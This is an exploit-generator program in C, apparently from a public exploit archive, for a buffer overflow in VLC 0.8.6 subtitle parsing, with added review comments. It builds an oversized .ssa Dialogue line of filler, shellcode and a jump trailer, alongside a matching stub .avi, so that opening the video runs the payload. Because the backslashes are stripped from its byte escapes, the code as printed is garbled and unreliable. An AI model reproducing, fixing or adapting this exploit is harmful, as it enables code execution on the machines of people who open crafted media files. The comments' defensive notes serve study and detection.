
# Title : VLC <= 0.8.6e Subtitle Parsing Local Buffer Overflow Exploit
# Published : 2008-03-14
# Author : Mai Xuan Cuong


/*
VLC <=0.8.6.e
Subtitle parsing local buffer overflow exploit
Credit to cuongmx@gmail.com vs Look2Me @
Tested on windows XP Pro SP2

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Text preamble of the generated SubStation Alpha (.ssa) subtitle file.
 * It stops at an open "Dialogue:" field; main() appends the filler, the
 * payload and the trailer directly after it, so all of that data ends up
 * on one Dialogue line.
 * NOTE(review): the line endings read "rn", which looks like an escape
 * sequence whose backslash was lost when the page was extracted; the
 * literal is kept exactly as shown.
 * Defensive takeaway: per the page title the flaw is an overflow in
 * subtitle parsing, so a parser should bound the length of a Dialogue
 * line before copying it, and a file scanner can treat a single Dialogue
 * line in the 160 KB range (the sizes main() selects) as anomalous.
 */
char ssa_header[]=
"[Script Info]rn"
"Title: VLC <= 0.8.6c,e buffer-overflowrn"
"ScriptType: v4.00rn"
"Collisions: Normalrn"
"[V4 Styles]rn"
"[Events]rn"
"Dialogue:";

// execute calculator from Meta
/*
 * Opaque payload that main() places at the end of the oversized Dialogue
 * line. According to the author's comment above it starts the calculator,
 * the customary proof-of-execution marker; "Meta" presumably names the
 * tool it was generated with -- not verifiable from this listing.
 * NOTE(review): the "xNN" runs look like byte escapes whose backslashes
 * were lost in extraction. As printed this is plain ASCII text, so
 * sizeof(shellcode), which main() subtracts from the filler length and
 * copies into a 200-byte buffer, differs from what the author intended.
 */
char shellcode[] =
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x3d"
"xbaxb1xd9x83xebxfcxe2xf4xc1x52xf5xd9x3dxbax3ax9c"
"x01x31xcdxdcx45xbbx5ex52x72xa2x3ax86x1dxbbx5ax90"
"xb6x8ex3axd8xd3x8bx71x40x91x3ex71xadx3ax7bx7bxd4"
"x3cx78x5ax2dx06xeex95xddx48x5fx3ax86x19xbbx5axbf"
"xb6xb6xfax52x62xa6xb0x32xb6xa6x3axd8xd6x33xedxfd"
"x39x79x80x19x59x31xf1xe9xb8x7axc9xd5xb6xfaxbdx52"
"x4dxa6x1cx52x55xb2x5axd0xb6x3ax01xd9x3dxbax3axb1"
"x01xe5x80x2fx5dxecx38x21xbex7axcax89x55xc4x69x3b"
"x4exd2x29x27xb7xb4xe6x26xdaxd9xd0xb5x5exbaxb1xd9";

/*
 * Short trailer that main() concatenates after the payload, making it the
 * last data on the Dialogue line. The name suggests jump instructions;
 * the listing does not document the individual bytes.
 * NOTE(review): as with the other literals, the backslashes of the byte
 * escapes appear to have been lost in extraction; kept as shown.
 */
char szJMP[]=
"x90x90xe9x38xffxffxffxebxf9x90x90x0bx0bx38x00";

/*
 * Stub that main() writes verbatim as Bof-VLC.avi. Read as hex byte
 * values, the entries are the ASCII codes of the RIFF container tags
 * "RIFF", "AVI " and "LIST" around a small size field, i.e. a bare header
 * with no stream data.
 * NOTE(review): the video shares its base name with the generated .ssa
 * file, presumably so that the player loads the subtitle automatically
 * when the video is opened -- confirm against the player's subtitle
 * auto-detection behaviour. For defenders this means a media file can
 * pull in an untrusted sibling subtitle file that the user never
 * selected, so both files need to be inspected together.
 */
char szAVI[]=
"x52x49x46x46xCx0x0x0x41x56x49x20x4Cx49x53x54x00x00x00";

/*
 * Interactive generator: asks which VLC build is targeted, then writes two
 * files into the current directory -- Bof-VLC.ssa (header, filler, payload
 * and trailer on a single Dialogue line) and Bof-VLC.avi (a stub video
 * with the same base name).
 *
 * NOTE(review), code quality as shown:
 *  - main() is declared without a return type (implicit int, not valid
 *    from C99 onwards).
 *  - any menu answer other than '1', '2' or '3' leaves k uninitialised
 *    before it is used as a length.
 *  - "exit;" names the function without calling it, so a failed fopen()
 *    still reaches fwrite()/fclose() with a NULL stream.
 *  - strcpy()/strcat() into szBuffer2[200] and szBuffer[170000] are
 *    unchecked and rely on the literal sizes happening to fit.
 */
main()
{
    int i,j,k;
    printf("Give me your VLC version:rn");
    printf("1> version 8.06.crn");
    printf("2> version 8.06.drn");
    printf("3> version 8.06.ernChose:");
    // only the first character of the answer is read
    j=getchar();
    // k is a per-build filler length; how the constants were derived is
    // not shown on the page. There is no default case.
    switch(j)
    {
        case '1': k=165254;break;
        case '2': printf("rnI haven't got this version!rn Good Luck :-)");
                  getchar();
                  return 0;break;
        case '3': k=165286;break;
    }
    // reserve room for the payload; sizeof counts the terminating NUL too
    k=k-sizeof(shellcode);
    printf("rn[+] Creating .ssa file ...");
    FILE*    f;
    // roughly 166 KB of automatic storage
    char    szBuffer[170000];
    char    szBuffer2[200];

    strcpy(szBuffer,ssa_header);    // header of ssa
    
    // Pad the Dialogue line with k filler bytes right after the header.
    // NOTE(review): 'x90' and 'x00' as printed are multi-character
    // constants with an implementation-defined value; they look like hex
    // escapes whose backslash was lost in extraction.
    memset((szBuffer+sizeof(ssa_header)-1),'x90',k);
    szBuffer[k+sizeof(ssa_header)]='x00';
    // payload followed by the trailer, assembled in the small buffer first
    strcpy(szBuffer2,shellcode);
    strcat(szBuffer2,szJMP);
    strcat(szBuffer,szBuffer2);
    
    f=fopen("Bof-VLC.ssa","wb");
    if(f==NULL)
    {
        printf("Can't create file");
        // NOTE(review): expression statement with no call -- does not exit
        exit;
    }
    // length comes from strlen(), so output stops at the first NUL byte
    fwrite(szBuffer,1,strlen(szBuffer),f);  // write header
    fclose(f);
    printf("rn[+] .ssa file successfully create!");
	
	printf("rn[+] Creation .avi file ...");
    f=fopen("Bof-VLC.avi","wb");
    if(f==NULL)
    {
        printf("Can't create file");
        // NOTE(review): same no-op as above; execution continues
        exit;
    }
    // sizeof includes the literal's terminating NUL
    fwrite(szAVI,1,sizeof(szAVI),f);  // write header
    fclose(f);	
    printf("rn[+] .avi file successfully create!");
    // wait for a key press before the console closes
    getchar();
}
